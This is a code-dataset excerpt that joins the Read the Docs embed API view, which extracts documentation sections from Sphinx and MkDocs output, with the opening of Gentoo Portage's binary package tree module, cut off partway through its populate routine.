# pylint: disable=line-too-long
"""
Embed a section of content from any Read the Docs page.
Returns headers and content that matches the queried section.
### Arguments
We support two different ways to query the API:
* project (required)
* version (required)
* doc or path (required)
* section
or:
* url (with fragment) (required)
### Example
    - GET https://readthedocs.org/api/v2/embed/?project=requests&version=latest&doc=index&section=User%20Guide&path=/index.html
- GET https://readthedocs.org/api/v2/embed/?url=https://docs.readthedocs.io/en/latest/features.html%23github-bitbucket-and-gitlab-integration
# Current Request
""" # noqa
permission_classes = [IsAuthorizedToViewVersion]
renderer_classes = [JSONRenderer, BrowsableAPIRenderer]
@functools.lru_cache(maxsize=1)
def _get_project(self):
if self.unresolved_url:
project_slug = self.unresolved_url.project.slug
else:
project_slug = self.request.GET.get('project')
return get_object_or_404(Project, slug=project_slug)
@functools.lru_cache(maxsize=1)
def _get_version(self):
if self.unresolved_url:
version_slug = self.unresolved_url.version_slug
else:
version_slug = self.request.GET.get('version', 'latest')
project = self._get_project()
return get_object_or_404(project.versions.all(), slug=version_slug)
@cached_property
def unresolved_url(self):
url = self.request.GET.get('url')
if not url:
return None
return unresolve(url)
def get(self, request):
"""Handle the get request."""
project = self._get_project()
version = self._get_version()
url = request.GET.get('url')
path = request.GET.get('path', '')
doc = request.GET.get('doc')
section = request.GET.get('section')
if url:
unresolved = self.unresolved_url
path = unresolved.filename
section = unresolved.fragment
elif not path and not doc:
return Response(
{
'error': (
'Invalid Arguments. '
'Please provide "url" or "section" and "path" GET arguments.'
)
},
status=status.HTTP_400_BAD_REQUEST
)
# Generate the docname from path
# by removing the ``.html`` extension and trailing ``/``.
if path:
doc = re.sub(r'(.+)\.html$', r'\1', path.strip('/'))
response = do_embed(
project=project,
version=version,
doc=doc,
section=section,
path=path,
url=url,
)
if not response:
return Response(
{
'error': (
"Can't find content for section: "
f"doc={doc} path={path} section={section}"
)
},
status=status.HTTP_404_NOT_FOUND
)
return Response(response)
class EmbedAPI(SettingsOverrideObject):
_default_class = EmbedAPIBase
def do_embed(*, project, version, doc=None, path=None, section=None, url=None):
"""Get the embed reponse from a document section."""
if not url:
external = version.type == EXTERNAL
url = resolve(
project=project,
version_slug=version.slug,
filename=path or doc,
external=external,
)
content = None
headers = None
if version.is_sphinx_type:
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
if not file_content:
return None
content, headers, section = parse_sphinx(
content=file_content,
section=section,
url=url,
)
else:
# TODO: this should read from the html file itself,
# we don't have fjson files for mkdocs.
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
content, headers, section = parse_mkdocs(
content=file_content,
section=section,
url=url,
)
if content is None:
return None
return {
'content': content,
'headers': headers,
'url': url,
'meta': {
'project': project.slug,
'version': version.slug,
'doc': doc,
'section': section,
},
}
def _get_doc_content(project, version, doc):
storage_path = project.get_storage_path(
'json',
version_slug=version.slug,
include_file=False,
version_type=version.type,
)
file_path = build_media_storage.join(
storage_path,
f'{doc}.fjson'.lstrip('/'),
)
try:
with build_media_storage.open(file_path) as file:
return json.load(file)
except Exception: # noqa
log.warning('Unable to read file. file_path=%s', file_path)
return None
def parse_sphinx(content, section, url):
"""Get the embed content for the section."""
body = content.get('body')
toc = content.get('toc')
if not content or not body or not toc:
return (None, None, section)
headers = [
recurse_while_none(element)
for element in PQ(toc)('a')
]
if not section and headers:
# If no section is sent, return the content of the first one
# TODO: This will always be the full page content,
# lets do something smarter here
section = list(headers[0].keys())[0].lower()
if not section:
return [], headers, None
body_obj = PQ(body)
escaped_section = escape_selector(section)
elements_id = [
escaped_section,
slugify(escaped_section),
make_id(escaped_section),
f'module-{escaped_section}',
]
query_result = []
for element_id in elements_id:
if not element_id:
continue
try:
query_result = body_obj(f'#{element_id}')
if query_result:
break
except Exception: # noqa
log.info(
'Failed to query section. url=%s id=%s',
url, element_id,
)
if not query_result:
selector = f':header:contains("{escaped_section}")'
query_result = body_obj(selector).parent()
# Handle ``dt`` special cases
if len(query_result) == 1 and query_result[0].tag == 'dt':
parent = query_result.parent()
if 'glossary' in parent.attr('class'):
# Sphinx HTML structure for term glossary puts the ``id`` in the
# ``dt`` element with the title of the term. In this case, we
# need to return the next sibling which contains the definition
# of the term itself.
# Structure:
# <dl class="glossary docutils">
# <dt id="term-definition">definition</dt>
# <dd>Text definition for the term</dd>
# ...
# </dl>
query_result = query_result.next()
elif 'citation' in parent.attr('class'):
# Sphinx HTML structure for sphinxcontrib-bibtex puts the ``id`` in the
# ``dt`` element with the title of the cite. In this case, we
# need to return the next sibling which contains the cite itself.
# Structure:
# <dl class="citation">
# <dt id="cite-id"><span><a>Title of the cite</a></span></dt>
# <dd>Content of the cite</dd>
# ...
# </dl>
query_result = query_result.next()
else:
# Sphinx HTML structure for definition list puts the ``id``
# the ``dt`` element, instead of the ``dl``. This makes
# the backend to return just the title of the definition. If we
# detect this case, we return the parent (the whole ``dl``)
# Structure:
# <dl class="confval">
# <dt id="confval-config">
# <code class="descname">config</code>
# <a class="headerlink" href="#confval-config">¶</a></dt>
# <dd><p>Text with a description</p></dd>
# </dl>
query_result = parent
def dump(obj):
"""Handle API-based doc HTML."""
if obj[0].tag in ['span', 'h2']:
return obj.parent().outerHtml()
return obj.outerHtml()
ret = [
dump(clean_links(PQ(obj), url))
for obj in query_result
]
return ret, headers, section
def parse_mkdocs(content, section, url): # pylint: disable=unused-argument
"""Get the embed content for the section."""
ret = []
headers = []
if not content or not content.get('content'):
return (None, None, section)
body = content['content']
for element in PQ(body)('h2'):
headers.append(recurse_while_none(element))
if not section and headers:
# If no section is sent, return the content of the first one
section = list(headers[0].keys())[0].lower()
if section:
body_obj = PQ(body)
escaped_section = escape_selector(section)
section_list = body_obj(
':header:contains("{title}")'.format(title=str(escaped_section)))
for num in range(len(section_list)):
header2 = section_list.eq(num)
# h2_title = h2.text().strip()
# section_id = h2.attr('id')
h2_content = ""
next_p = header2.next()
while next_p:
if next_p[0].tag == 'h2':
break
h2_html = next_p.outerHtml()
if h2_html:
h2_content += "\n%s\n" % h2_html
next_p = next_p.next()
if h2_content:
ret.append(h2_content)
# ret.append({
# 'id': section_id,
# 'title': h2_title,
# 'content': h2_content,
# })
return (ret, headers, section)
| mit | -5,494,567,154,929,641,000 | 30.733967 | 145 | 0.565569 | false |
clickbeetle/portage-cb | pym/portage/dbapi/bintree.py | 1 | 44915 | # Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ["bindbapi", "binarytree"]
import portage
portage.proxy.lazyimport.lazyimport(globals(),
'portage.checksum:hashfunc_map,perform_multiple_checksums,' + \
'verify_all,_apply_hash_filter,_hash_filter',
'portage.dbapi.dep_expand:dep_expand',
'portage.dep:dep_getkey,isjustname,isvalidatom,match_from_list',
'portage.output:EOutput,colorize',
'portage.locks:lockfile,unlockfile',
'portage.package.ebuild.fetch:_check_distfile,_hide_url_passwd',
'portage.update:update_dbentries',
'portage.util:atomic_ofstream,ensure_dirs,normalize_path,' + \
'writemsg,writemsg_stdout',
'portage.util.listdir:listdir',
'portage.util._urlopen:urlopen@_urlopen',
'portage.versions:best,catpkgsplit,catsplit,_pkg_str',
)
from portage.cache.mappings import slot_dict_class
from portage.const import CACHE_PATH
from portage.dbapi.virtual import fakedbapi
from portage.dep import Atom, use_reduce, paren_enclose
from portage.exception import AlarmSignal, InvalidData, InvalidPackageName, \
PermissionDenied, PortageException
from portage.localization import _
from portage import _movefile
from portage import os
from portage import _encodings
from portage import _unicode_decode
from portage import _unicode_encode
import codecs
import errno
import io
import stat
import subprocess
import sys
import tempfile
import textwrap
import warnings
from gzip import GzipFile
from itertools import chain
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.hexversion >= 0x3000000:
_unicode = str
basestring = str
long = int
else:
_unicode = unicode
class UseCachedCopyOfRemoteIndex(Exception):
# If the local copy is recent enough
# then fetching the remote index can be skipped.
pass
class bindbapi(fakedbapi):
_known_keys = frozenset(list(fakedbapi._known_keys) + \
["CHOST", "repository", "USE"])
def __init__(self, mybintree=None, **kwargs):
fakedbapi.__init__(self, **kwargs)
self.bintree = mybintree
self.move_ent = mybintree.move_ent
self.cpvdict={}
self.cpdict={}
# Selectively cache metadata in order to optimize dep matching.
self._aux_cache_keys = set(
["BUILD_TIME", "CHOST", "DEPEND", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS",
"LICENSE", "PDEPEND", "PROPERTIES", "PROVIDE",
"RDEPEND", "repository", "RESTRICT", "SLOT", "USE", "DEFINED_PHASES"
])
self._aux_cache_slot_dict = slot_dict_class(self._aux_cache_keys)
self._aux_cache = {}
def match(self, *pargs, **kwargs):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.match(self, *pargs, **kwargs)
def cpv_exists(self, cpv, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_exists(self, cpv)
def cpv_inject(self, cpv, **kwargs):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_inject(self, cpv, **kwargs)
def cpv_remove(self, cpv):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_remove(self, cpv)
def aux_get(self, mycpv, wants, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
cache_me = False
if not self._known_keys.intersection(
wants).difference(self._aux_cache_keys):
aux_cache = self._aux_cache.get(mycpv)
if aux_cache is not None:
return [aux_cache.get(x, "") for x in wants]
cache_me = True
mysplit = mycpv.split("/")
mylist = []
tbz2name = mysplit[1]+".tbz2"
if not self.bintree._remotepkgs or \
not self.bintree.isremote(mycpv):
tbz2_path = self.bintree.getname(mycpv)
if not os.path.exists(tbz2_path):
raise KeyError(mycpv)
metadata_bytes = portage.xpak.tbz2(tbz2_path).get_data()
def getitem(k):
v = metadata_bytes.get(_unicode_encode(k,
encoding=_encodings['repo.content'],
errors='backslashreplace'))
if v is not None:
v = _unicode_decode(v,
encoding=_encodings['repo.content'], errors='replace')
return v
else:
getitem = self.bintree._remotepkgs[mycpv].get
mydata = {}
mykeys = wants
if cache_me:
mykeys = self._aux_cache_keys.union(wants)
for x in mykeys:
myval = getitem(x)
# myval is None if the key doesn't exist
# or the tbz2 is corrupt.
if myval:
mydata[x] = " ".join(myval.split())
if not mydata.setdefault('EAPI', _unicode_decode('0')):
mydata['EAPI'] = _unicode_decode('0')
if cache_me:
aux_cache = self._aux_cache_slot_dict()
for x in self._aux_cache_keys:
aux_cache[x] = mydata.get(x, _unicode_decode(''))
self._aux_cache[mycpv] = aux_cache
return [mydata.get(x, _unicode_decode('')) for x in wants]
def aux_update(self, cpv, values):
if not self.bintree.populated:
self.bintree.populate()
tbz2path = self.bintree.getname(cpv)
if not os.path.exists(tbz2path):
raise KeyError(cpv)
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
for k, v in values.items():
k = _unicode_encode(k,
encoding=_encodings['repo.content'], errors='backslashreplace')
v = _unicode_encode(v,
encoding=_encodings['repo.content'], errors='backslashreplace')
mydata[k] = v
for k, v in list(mydata.items()):
if not v:
del mydata[k]
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
# inject will clear stale caches via cpv_inject.
self.bintree.inject(cpv)
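	# Illustrative usage (not part of the original class): rewrite one metadata
	# key inside the package's xpak segment and re-inject it into the index,
	# e.g. for a hypothetical cpv already present in PKGDIR:
	#   bintree.dbapi.aux_update("app-misc/foo-1.0", {"SLOT": "1"})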
def cp_list(self, *pargs, **kwargs):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_list(self, *pargs, **kwargs)
def cp_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_all(self)
def cpv_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_all(self)
def getfetchsizes(self, pkg):
"""
This will raise MissingSignature if SIZE signature is not available,
or InvalidSignature if SIZE signature is invalid.
"""
if not self.bintree.populated:
self.bintree.populate()
pkg = getattr(pkg, 'cpv', pkg)
filesdict = {}
if not self.bintree.isremote(pkg):
pass
else:
metadata = self.bintree._remotepkgs[pkg]
try:
size = int(metadata["SIZE"])
except KeyError:
raise portage.exception.MissingSignature("SIZE")
except ValueError:
raise portage.exception.InvalidSignature(
"SIZE: %s" % metadata["SIZE"])
else:
filesdict[os.path.basename(self.bintree.getname(pkg))] = size
return filesdict
def _pkgindex_cpv_map_latest_build(pkgindex):
"""
Given a PackageIndex instance, create a dict of cpv -> metadata map.
If multiple packages have identical CPV values, prefer the package
with latest BUILD_TIME value.
@param pkgindex: A PackageIndex instance.
@type pkgindex: PackageIndex
@rtype: dict
	@return: a dict mapping each cpv to its latest-build metadata entry.
"""
cpv_map = {}
for d in pkgindex.packages:
cpv = d["CPV"]
try:
cpv = _pkg_str(cpv)
except InvalidData:
writemsg(_("!!! Invalid remote binary package: %s\n") % cpv,
noiselevel=-1)
continue
btime = d.get('BUILD_TIME', '')
try:
btime = int(btime)
except ValueError:
btime = None
other_d = cpv_map.get(cpv)
if other_d is not None:
other_btime = other_d.get('BUILD_TIME', '')
try:
other_btime = int(other_btime)
except ValueError:
other_btime = None
if other_btime and (not btime or other_btime > btime):
continue
cpv_map[_pkg_str(cpv)] = d
return cpv_map
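# Illustrative sketch (not part of the original module) with hypothetical
# entries: when two Packages entries share a CPV, the newer BUILD_TIME wins.
#   pkgindex.packages = [
#       {"CPV": "app-misc/foo-1.0", "BUILD_TIME": "100"},
#       {"CPV": "app-misc/foo-1.0", "BUILD_TIME": "200"},
#   ]
#   _pkgindex_cpv_map_latest_build(pkgindex)["app-misc/foo-1.0"]["BUILD_TIME"]
#   # -> "200"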
class binarytree(object):
"this tree scans for a list of all packages available in PKGDIR"
def __init__(self, _unused=None, pkgdir=None,
virtual=DeprecationWarning, settings=None):
if pkgdir is None:
raise TypeError("pkgdir parameter is required")
if settings is None:
raise TypeError("settings parameter is required")
if _unused is not None and _unused != settings['ROOT']:
warnings.warn("The root parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is now unused. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=2)
if virtual is not DeprecationWarning:
warnings.warn("The 'virtual' parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is unused",
DeprecationWarning, stacklevel=2)
if True:
self.pkgdir = normalize_path(pkgdir)
self.dbapi = bindbapi(self, settings=settings)
self.update_ents = self.dbapi.update_ents
self.move_slot_ent = self.dbapi.move_slot_ent
self.populated = 0
self.tree = {}
self._remote_has_index = False
self._remotepkgs = None # remote metadata indexed by cpv
self.invalids = []
self.settings = settings
self._pkg_paths = {}
self._pkgindex_uri = {}
self._populating = False
self._all_directory = os.path.isdir(
os.path.join(self.pkgdir, "All"))
self._pkgindex_version = 0
self._pkgindex_hashes = ["MD5","SHA1"]
self._pkgindex_file = os.path.join(self.pkgdir, "Packages")
self._pkgindex_keys = self.dbapi._aux_cache_keys.copy()
self._pkgindex_keys.update(["CPV", "MTIME", "SIZE"])
self._pkgindex_aux_keys = \
["BUILD_TIME", "CHOST", "DEPEND", "DESCRIPTION", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS", "LICENSE", "PDEPEND", "PROPERTIES",
"PROVIDE", "RDEPEND", "repository", "SLOT", "USE", "DEFINED_PHASES",
"BASE_URI"]
self._pkgindex_aux_keys = list(self._pkgindex_aux_keys)
self._pkgindex_use_evaluated_keys = \
("DEPEND", "HDEPEND", "LICENSE", "RDEPEND",
"PDEPEND", "PROPERTIES", "PROVIDE")
self._pkgindex_header_keys = set([
"ACCEPT_KEYWORDS", "ACCEPT_LICENSE",
"ACCEPT_PROPERTIES", "CBUILD",
"CONFIG_PROTECT", "CONFIG_PROTECT_MASK", "FEATURES",
"GENTOO_MIRRORS", "INSTALL_MASK", "SYNC", "USE"])
self._pkgindex_default_pkg_data = {
"BUILD_TIME" : "",
"DEFINED_PHASES" : "",
"DEPEND" : "",
"EAPI" : "0",
"HDEPEND" : "",
"IUSE" : "",
"KEYWORDS": "",
"LICENSE" : "",
"PATH" : "",
"PDEPEND" : "",
"PROPERTIES" : "",
"PROVIDE" : "",
"RDEPEND" : "",
"RESTRICT": "",
"SLOT" : "0",
"USE" : "",
}
self._pkgindex_inherited_keys = ["CHOST", "repository"]
# Populate the header with appropriate defaults.
self._pkgindex_default_header_data = {
"CHOST" : self.settings.get("CHOST", ""),
"repository" : "",
}
# It is especially important to populate keys like
# "repository" that save space when entries can
# inherit them from the header. If an existing
# pkgindex header already defines these keys, then
# they will appropriately override our defaults.
main_repo = self.settings.repositories.mainRepo()
if main_repo is not None and not main_repo.missing_repo_name:
self._pkgindex_default_header_data["repository"] = \
main_repo.name
self._pkgindex_translated_keys = (
("DESCRIPTION" , "DESC"),
("repository" , "REPO"),
)
self._pkgindex_allowed_pkg_keys = set(chain(
self._pkgindex_keys,
self._pkgindex_aux_keys,
self._pkgindex_hashes,
self._pkgindex_default_pkg_data,
self._pkgindex_inherited_keys,
chain(*self._pkgindex_translated_keys)
))
@property
def root(self):
warnings.warn("The root attribute of "
"portage.dbapi.bintree.binarytree"
" is deprecated. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=3)
return self.settings['ROOT']
def move_ent(self, mylist, repo_match=None):
if not self.populated:
self.populate()
origcp = mylist[1]
newcp = mylist[2]
# sanity check
for atom in (origcp, newcp):
if not isjustname(atom):
raise InvalidPackageName(str(atom))
mynewcat = catsplit(newcp)[0]
origmatches=self.dbapi.cp_list(origcp)
moves = 0
if not origmatches:
return moves
for mycpv in origmatches:
try:
mycpv = self.dbapi._pkg_str(mycpv, None)
except (KeyError, InvalidData):
continue
mycpv_cp = portage.cpv_getkey(mycpv)
if mycpv_cp != origcp:
# Ignore PROVIDE virtual match.
continue
if repo_match is not None \
and not repo_match(mycpv.repo):
continue
# Use isvalidatom() to check if this move is valid for the
# EAPI (characters allowed in package names may vary).
if not isvalidatom(newcp, eapi=mycpv.eapi):
continue
mynewcpv = mycpv.replace(mycpv_cp, _unicode(newcp), 1)
myoldpkg = catsplit(mycpv)[1]
mynewpkg = catsplit(mynewcpv)[1]
if (mynewpkg != myoldpkg) and os.path.exists(self.getname(mynewcpv)):
writemsg(_("!!! Cannot update binary: Destination exists.\n"),
noiselevel=-1)
writemsg("!!! "+mycpv+" -> "+mynewcpv+"\n", noiselevel=-1)
continue
tbz2path = self.getname(mycpv)
if os.path.exists(tbz2path) and not os.access(tbz2path,os.W_OK):
writemsg(_("!!! Cannot update readonly binary: %s\n") % mycpv,
noiselevel=-1)
continue
moves += 1
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
updated_items = update_dbentries([mylist], mydata, eapi=mycpv.eapi)
mydata.update(updated_items)
mydata[b'PF'] = \
_unicode_encode(mynewpkg + "\n",
encoding=_encodings['repo.content'])
mydata[b'CATEGORY'] = \
_unicode_encode(mynewcat + "\n",
encoding=_encodings['repo.content'])
if mynewpkg != myoldpkg:
ebuild_data = mydata.pop(_unicode_encode(myoldpkg + '.ebuild',
encoding=_encodings['repo.content']), None)
if ebuild_data is not None:
mydata[_unicode_encode(mynewpkg + '.ebuild',
encoding=_encodings['repo.content'])] = ebuild_data
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
self.dbapi.cpv_remove(mycpv)
del self._pkg_paths[mycpv]
new_path = self.getname(mynewcpv)
self._pkg_paths[mynewcpv] = os.path.join(
*new_path.split(os.path.sep)[-2:])
if new_path != mytbz2:
self._ensure_dir(os.path.dirname(new_path))
_movefile(tbz2path, new_path, mysettings=self.settings)
self._remove_symlink(mycpv)
if new_path.split(os.path.sep)[-2] == "All":
self._create_symlink(mynewcpv)
self.inject(mynewcpv)
return moves
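	# A minimal sketch of a package-move entry (hypothetical names; only
	# mylist[1] and mylist[2] are read above, and real entries come from
	# portage's update parsing, so plain strings are an assumption here):
	#
	#     mylist = ["move", "dev-foo/oldname", "dev-foo/newname"]
	#     moved = bintree.move_ent(mylist)  # number of rewritten binaries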
def _remove_symlink(self, cpv):
"""Remove a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink and also remove
the ${PKGDIR}/${CATEGORY} directory if empty. The file will not be
removed if os.path.islink() returns False."""
mycat, mypkg = catsplit(cpv)
mylink = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
if os.path.islink(mylink):
"""Only remove it if it's really a link so that this method never
removes a real package that was placed here to avoid a collision."""
os.unlink(mylink)
try:
os.rmdir(os.path.join(self.pkgdir, mycat))
except OSError as e:
if e.errno not in (errno.ENOENT,
errno.ENOTEMPTY, errno.EEXIST):
raise
del e
def _create_symlink(self, cpv):
"""Create a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink (and
${PKGDIR}/${CATEGORY} directory, if necessary). Any file that may
exist in the location of the symlink will first be removed."""
mycat, mypkg = catsplit(cpv)
full_path = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
self._ensure_dir(os.path.dirname(full_path))
try:
os.unlink(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
os.symlink(os.path.join("..", "All", mypkg + ".tbz2"), full_path)
def prevent_collision(self, cpv):
"""Make sure that the file location ${PKGDIR}/All/${PF}.tbz2 is safe to
use for a given cpv. If a collision will occur with an existing
package from another category, the existing package will be bumped to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 so that both can coexist."""
if not self._all_directory:
return
# Copy group permissions for new directories that
# may have been created.
for path in ("All", catsplit(cpv)[0]):
path = os.path.join(self.pkgdir, path)
self._ensure_dir(path)
if not os.access(path, os.W_OK):
raise PermissionDenied("access('%s', W_OK)" % path)
full_path = self.getname(cpv)
if "All" == full_path.split(os.path.sep)[-2]:
return
"""Move a colliding package if it exists. Code below this point only
executes in rare cases."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join("All", myfile)
dest_path = os.path.join(self.pkgdir, mypath)
try:
st = os.lstat(dest_path)
except OSError:
st = None
else:
if stat.S_ISLNK(st.st_mode):
st = None
try:
os.unlink(dest_path)
except OSError:
if os.path.exists(dest_path):
raise
if st is not None:
# For invalid packages, other_cat could be None.
other_cat = portage.xpak.tbz2(dest_path).getfile(b"CATEGORY")
if other_cat:
other_cat = _unicode_decode(other_cat,
encoding=_encodings['repo.content'], errors='replace')
other_cat = other_cat.strip()
other_cpv = other_cat + "/" + mypkg
self._move_from_all(other_cpv)
self.inject(other_cpv)
self._move_to_all(cpv)
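	# A worked example of the collision handling above (hypothetical names):
	# if ${PKGDIR}/All/bar-1.0.tbz2 currently belongs to dev-foo/bar-1.0, then
	# prevent_collision("app-baz/bar-1.0") bumps the existing binary to
	# ${PKGDIR}/dev-foo/bar-1.0.tbz2 and moves app-baz/bar-1.0 into All/, so
	# both packages can coexist.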
def _ensure_dir(self, path):
"""
Create the specified directory. Also, copy gid and group mode
bits from self.pkgdir if possible.
		@param path: Absolute path of the directory to be created.
		@type path: String
"""
try:
pkgdir_st = os.stat(self.pkgdir)
except OSError:
ensure_dirs(path)
return
pkgdir_gid = pkgdir_st.st_gid
pkgdir_grp_mode = 0o2070 & pkgdir_st.st_mode
try:
ensure_dirs(path, gid=pkgdir_gid, mode=pkgdir_grp_mode, mask=0)
except PortageException:
if not os.path.isdir(path):
raise
def _move_to_all(self, cpv):
"""If the file exists, move it. Whether or not it exists, update state
for future getname() calls."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
self._pkg_paths[cpv] = os.path.join("All", myfile)
src_path = os.path.join(self.pkgdir, mycat, myfile)
try:
mystat = os.lstat(src_path)
except OSError as e:
mystat = None
if mystat and stat.S_ISREG(mystat.st_mode):
self._ensure_dir(os.path.join(self.pkgdir, "All"))
dest_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._create_symlink(cpv)
self.inject(cpv)
def _move_from_all(self, cpv):
"""Move a package from ${PKGDIR}/All/${PF}.tbz2 to
		${PKGDIR}/${CATEGORY}/${PF}.tbz2 and update state for future getname() calls."""
self._remove_symlink(cpv)
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join(mycat, myfile)
dest_path = os.path.join(self.pkgdir, mypath)
self._ensure_dir(os.path.dirname(dest_path))
src_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._pkg_paths[cpv] = mypath
def populate(self, getbinpkgs=0):
"populates the binarytree"
if self._populating:
return
pkgindex_lock = None
try:
if os.access(self.pkgdir, os.W_OK):
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
self._populating = True
self._populate(getbinpkgs)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
self._populating = False
def _populate(self, getbinpkgs=0):
if (not os.path.isdir(self.pkgdir) and not getbinpkgs):
return 0
# Clear all caches in case populate is called multiple times
# as may be the case when _global_updates calls populate()
# prior to performing package moves since it only wants to
# operate on local packages (getbinpkgs=0).
self._remotepkgs = None
self.dbapi._clear_cache()
self.dbapi._aux_cache.clear()
if True:
pkg_paths = {}
self._pkg_paths = pkg_paths
dirs = listdir(self.pkgdir, dirsonly=True, EmptyOnError=True)
if "All" in dirs:
dirs.remove("All")
dirs.sort()
dirs.insert(0, "All")
pkgindex = self._load_pkgindex()
pf_index = None
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
header = pkgindex.header
metadata = {}
for d in pkgindex.packages:
metadata[d["CPV"]] = d
update_pkgindex = False
for mydir in dirs:
for myfile in listdir(os.path.join(self.pkgdir, mydir)):
if not myfile.endswith(".tbz2"):
continue
mypath = os.path.join(mydir, myfile)
full_path = os.path.join(self.pkgdir, mypath)
s = os.lstat(full_path)
if stat.S_ISLNK(s.st_mode):
continue
# Validate data from the package index and try to avoid
# reading the xpak if possible.
if mydir != "All":
possibilities = None
d = metadata.get(mydir+"/"+myfile[:-5])
if d:
possibilities = [d]
else:
if pf_index is None:
pf_index = {}
for mycpv in metadata:
mycat, mypf = catsplit(mycpv)
pf_index.setdefault(
mypf, []).append(metadata[mycpv])
possibilities = pf_index.get(myfile[:-5])
if possibilities:
match = None
for d in possibilities:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
continue
except (KeyError, ValueError):
continue
try:
if long(d["SIZE"]) != long(s.st_size):
continue
except (KeyError, ValueError):
continue
if not self._pkgindex_keys.difference(d):
match = d
break
if match:
mycpv = match["CPV"]
if mycpv in pkg_paths:
# discard duplicates (All/ is preferred)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
# update the path if the package has been moved
oldpath = d.get("PATH")
if oldpath and oldpath != mypath:
update_pkgindex = True
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
if not oldpath:
update_pkgindex = True
else:
d.pop("PATH", None)
if oldpath:
update_pkgindex = True
self.dbapi.cpv_inject(mycpv)
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
continue
if not os.access(full_path, os.R_OK):
writemsg(_("!!! Permission denied to read " \
"binary package: '%s'\n") % full_path,
noiselevel=-1)
self.invalids.append(myfile[:-5])
continue
metadata_bytes = portage.xpak.tbz2(full_path).get_data()
mycat = _unicode_decode(metadata_bytes.get(b"CATEGORY", ""),
encoding=_encodings['repo.content'], errors='replace')
mypf = _unicode_decode(metadata_bytes.get(b"PF", ""),
encoding=_encodings['repo.content'], errors='replace')
slot = _unicode_decode(metadata_bytes.get(b"SLOT", ""),
encoding=_encodings['repo.content'], errors='replace')
mypkg = myfile[:-5]
if not mycat or not mypf or not slot:
#old-style or corrupt package
writemsg(_("\n!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
missing_keys = []
if not mycat:
missing_keys.append("CATEGORY")
if not mypf:
missing_keys.append("PF")
if not slot:
missing_keys.append("SLOT")
msg = []
if missing_keys:
missing_keys.sort()
msg.append(_("Missing metadata key(s): %s.") % \
", ".join(missing_keys))
msg.append(_(" This binary package is not " \
"recoverable and should be deleted."))
for line in textwrap.wrap("".join(msg), 72):
writemsg("!!! %s\n" % line, noiselevel=-1)
self.invalids.append(mypkg)
continue
mycat = mycat.strip()
slot = slot.strip()
if mycat != mydir and mydir != "All":
continue
if mypkg != mypf.strip():
continue
mycpv = mycat + "/" + mypkg
if mycpv in pkg_paths:
# All is first, so it's preferred.
continue
if not self.dbapi._category_re.match(mycat):
writemsg(_("!!! Binary package has an " \
"unrecognized category: '%s'\n") % full_path,
noiselevel=-1)
writemsg(_("!!! '%s' has a category that is not" \
" listed in %setc/portage/categories\n") % \
(mycpv, self.settings["PORTAGE_CONFIGROOT"]),
noiselevel=-1)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
self.dbapi.cpv_inject(mycpv)
update_pkgindex = True
d = metadata.get(mycpv, {})
if d:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
d.clear()
except (KeyError, ValueError):
d.clear()
if d:
try:
if long(d["SIZE"]) != long(s.st_size):
d.clear()
except (KeyError, ValueError):
d.clear()
d["CPV"] = mycpv
d["SLOT"] = slot
d["MTIME"] = str(s[stat.ST_MTIME])
d["SIZE"] = str(s.st_size)
d.update(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(mycpv, self._pkgindex_aux_keys)))
try:
self._eval_use_flags(mycpv, d)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(mycpv), noiselevel=-1)
self.dbapi.cpv_remove(mycpv)
del pkg_paths[mycpv]
# record location if it's non-default
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
else:
d.pop("PATH", None)
metadata[mycpv] = d
